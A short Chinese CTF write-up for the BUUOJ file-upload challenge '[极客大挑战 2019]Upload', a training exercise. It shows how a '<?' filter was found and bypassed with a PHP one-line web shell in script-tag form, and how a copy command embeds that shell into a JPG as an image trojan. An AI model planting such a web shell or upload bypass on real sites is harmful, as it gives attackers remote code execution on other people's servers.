CTF Web buu oj day14
[极客大挑战 2019]Upload
类型
文件上传
解题
第一种方法,通过做图片马:
- burp打开页面,title=上传头像:
- 上传一个图片吧,1.png,提交后提示Not image!看来这个图片格式不行
- 上传另一个格式的1.jpg,提交后提示NO! HACKER! your file included ‘<?’,看来这个图片有<?被检测到,Editor010打开图片找到<?去掉后上传成功
- 尝试通过url/uploads/1.jpg、url/upload/1.jpg访问,可以看到刚刚上传的图片1.jpg
- 接下来做图片马,通过1.jpg上传知道过滤<?,所以一句话木马要绕过这个检测:
<script language="php">@eval($_POST[666])</script>
把这个一句话放到2.php里,然后通过命令合成:
copy 1.jpg/b+2.php/a 999.jpg